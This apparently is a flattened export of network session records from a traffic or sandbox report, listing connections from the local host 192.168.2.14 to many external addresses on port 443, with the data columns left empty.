                                                        15429192.168.2.1454652189.176.241.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15430192.168.2.145596023.122.129.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15431192.168.2.143808262.242.224.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15432192.168.2.1440716114.79.132.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15433192.168.2.1448950142.251.137.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15434192.168.2.1437234210.165.85.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15435192.168.2.1448294110.237.237.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15436192.168.2.1447604186.221.110.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15437192.168.2.145428692.118.45.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15438192.168.2.143586641.43.151.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15439192.168.2.1457674144.22.222.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15440192.168.2.1460002217.226.84.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15441192.168.2.1434698110.135.71.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15442192.168.2.1437416118.149.136.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15443192.168.2.1434554184.23.131.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15444192.168.2.143983474.63.7.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15445192.168.2.1457456193.96.228.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15446192.168.2.1438046188.143.252.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15447192.168.2.144517847.20.97.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15448192.168.2.144891669.204.29.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15449192.168.2.1458484139.88.139.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15450192.168.2.1444734120.89.235.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15451192.168.2.1451206122.232.120.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15452192.168.2.1457374113.8.44.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15453192.168.2.1459734202.18.107.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15454192.168.2.14509564.222.31.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15455192.168.2.1439958160.130.183.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15456192.168.2.1433300122.178.204.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15457192.168.2.145022259.193.100.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15458192.168.2.1455250203.132.102.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15459192.168.2.145774235.153.226.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15460192.168.2.144112488.182.71.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15461192.168.2.1454482177.197.203.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15462192.168.2.1436296165.190.70.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15463192.168.2.145142669.105.147.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15464192.168.2.1441750126.61.158.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15465192.168.2.1434670115.93.125.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15466192.168.2.144098053.214.87.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15467192.168.2.1457630129.199.82.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15468192.168.2.1459738177.242.80.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15469192.168.2.144669294.131.38.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15470192.168.2.1447884152.117.68.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15471192.168.2.145426079.255.204.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15472192.168.2.1443554162.80.201.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15473192.168.2.143307676.39.21.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15474192.168.2.1444384103.172.18.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15475192.168.2.1438644137.43.42.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15476192.168.2.144268497.22.146.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15477192.168.2.1444562110.167.130.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15478192.168.2.1456456209.93.43.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15479192.168.2.143377486.164.52.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15480192.168.2.1449902173.14.185.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15481192.168.2.145315234.252.98.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15482192.168.2.1444126100.26.17.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15483192.168.2.143539289.226.234.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15484192.168.2.14447509.143.109.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15485192.168.2.145516441.191.152.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15486192.168.2.144466453.183.245.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15487192.168.2.145165242.202.143.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15488192.168.2.1449438220.178.172.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15489192.168.2.1448456183.132.42.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15490192.168.2.143297414.82.220.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15491192.168.2.143913625.58.128.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15492192.168.2.1433200184.59.95.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15493192.168.2.1457906199.62.126.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15494192.168.2.144393460.40.14.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15495192.168.2.144571060.30.224.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15496192.168.2.14514842.62.69.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15497192.168.2.144281090.129.144.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15498192.168.2.1441520100.221.42.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15499192.168.2.1433460148.26.73.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15500192.168.2.145584457.134.50.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15501192.168.2.143363078.195.62.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15502192.168.2.1457082151.249.151.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15503192.168.2.1445158104.19.143.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15504192.168.2.1435848151.59.117.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15505192.168.2.144074064.11.249.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15506192.168.2.1437510166.4.237.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15507192.168.2.1454104139.139.250.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15508192.168.2.1458696154.241.12.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15509192.168.2.145188223.207.186.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15510192.168.2.145623277.78.246.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15511192.168.2.1433964157.213.189.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15512192.168.2.146040258.138.226.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15513192.168.2.1434484212.49.115.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15514192.168.2.1433418138.33.202.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15515192.168.2.143452479.170.167.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15516192.168.2.145876454.239.143.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15517192.168.2.1440942199.250.202.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15518192.168.2.14510202.14.41.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15519192.168.2.143824244.254.183.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15520192.168.2.144112825.220.226.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15521192.168.2.145202662.56.29.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15522192.168.2.1449324217.48.134.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15523192.168.2.1456202217.237.142.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15524192.168.2.143482637.97.236.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15525192.168.2.1456638187.53.249.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15526192.168.2.1451426183.251.11.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15527192.168.2.1459570144.13.111.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15528192.168.2.145862649.79.154.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15529192.168.2.143641849.37.6.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15530192.168.2.1433826152.187.188.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15531192.168.2.143899694.153.202.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15532192.168.2.1438278101.73.132.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15533192.168.2.145853883.168.70.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15534192.168.2.1448882120.172.241.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15535192.168.2.1435558170.96.67.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15536192.168.2.145194652.197.206.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15537192.168.2.145217877.54.248.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15538192.168.2.143900825.148.190.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15539192.168.2.143728659.41.203.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15540192.168.2.145248498.165.29.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15541192.168.2.1455392210.187.94.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15542192.168.2.144858612.157.8.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15543192.168.2.1459654141.171.195.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15544192.168.2.144912648.104.218.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15545192.168.2.1440582133.168.196.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15546192.168.2.145227490.92.158.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15547192.168.2.1435414186.33.27.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15548192.168.2.1447866144.215.143.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15549192.168.2.1457476124.39.145.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15550192.168.2.14494961.165.254.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15551192.168.2.1454998217.191.149.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15552192.168.2.144028849.190.196.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15553192.168.2.1445636158.204.131.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15554192.168.2.1457744205.49.156.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15555192.168.2.1440946128.227.239.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15556192.168.2.145845880.177.38.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15557192.168.2.143582459.30.163.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15558192.168.2.1433636155.61.185.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15559192.168.2.1450472221.117.6.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15560192.168.2.144288086.83.127.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15561192.168.2.145815817.185.14.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15562192.168.2.145008672.210.153.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15563192.168.2.145293264.227.198.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15564192.168.2.1435022130.250.107.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15565192.168.2.1453526150.73.214.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15566192.168.2.145737069.166.245.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15567192.168.2.144609041.24.58.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15568192.168.2.1434110138.3.69.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15569192.168.2.1446088209.41.248.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15570192.168.2.1434406178.67.127.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15571192.168.2.145203658.59.172.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15572192.168.2.1446968202.148.170.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15573192.168.2.1438198172.197.69.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15574192.168.2.144534882.86.101.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15575192.168.2.1449436116.44.197.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15576192.168.2.1451634179.13.239.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15577192.168.2.145172448.88.64.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15578192.168.2.1450464178.187.115.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15579192.168.2.145738076.79.105.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15580192.168.2.146039848.127.169.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15581192.168.2.1433634158.75.18.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15582192.168.2.143681834.84.164.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15583192.168.2.1451098199.51.138.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15584192.168.2.1447470191.103.234.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15585192.168.2.143572462.217.8.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15586192.168.2.1447396154.100.172.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15587192.168.2.1453066143.65.181.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15588192.168.2.1439012222.71.237.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15589192.168.2.1452166219.65.103.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15590192.168.2.1435996207.142.225.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15591192.168.2.1455976141.156.101.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15592192.168.2.1432940205.15.124.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15593192.168.2.144797642.242.224.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15594192.168.2.145300845.53.232.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15595192.168.2.1456954163.103.164.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15596192.168.2.145869436.61.244.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15597192.168.2.1448092138.215.190.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15598192.168.2.1456748151.81.209.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15599192.168.2.1449244212.230.243.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15600192.168.2.145784097.24.196.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15601192.168.2.1459068112.147.109.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15602192.168.2.1441148208.149.191.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15603192.168.2.1445024161.112.127.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15604192.168.2.143845848.104.249.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15605192.168.2.1436744121.223.8.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15606192.168.2.1434364108.177.102.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15607192.168.2.143616073.108.203.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15608192.168.2.145988663.104.15.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15609192.168.2.143513243.247.235.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15610192.168.2.1458386205.10.81.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15611192.168.2.1437282204.223.14.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15612192.168.2.144110294.255.191.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15613192.168.2.1453430137.247.36.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15614192.168.2.1446400216.214.48.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15615192.168.2.143866698.114.126.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15616192.168.2.1438012163.197.2.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15617192.168.2.144850027.55.251.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15618192.168.2.14451568.26.142.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15619192.168.2.1437656170.169.123.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15620192.168.2.1457820139.215.98.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15621192.168.2.143482440.168.121.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15622192.168.2.1444754150.20.95.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15623192.168.2.1455848120.60.210.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15624192.168.2.1454038119.32.0.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15625192.168.2.144695670.58.196.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15626192.168.2.1456522205.239.99.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15627192.168.2.144765034.172.251.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15628192.168.2.1436492140.149.65.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15629192.168.2.14576224.209.169.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15630192.168.2.1450152112.98.169.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15631192.168.2.1457918213.246.235.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15632192.168.2.144201269.95.245.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15633192.168.2.145796658.246.140.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15634192.168.2.1433218125.21.190.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15635192.168.2.144151296.48.204.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15636192.168.2.1439840115.142.193.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15637192.168.2.1453642171.200.205.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15638192.168.2.144093836.175.51.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15639192.168.2.143757650.210.97.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15640192.168.2.144251427.108.160.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15641192.168.2.144296089.130.154.179443
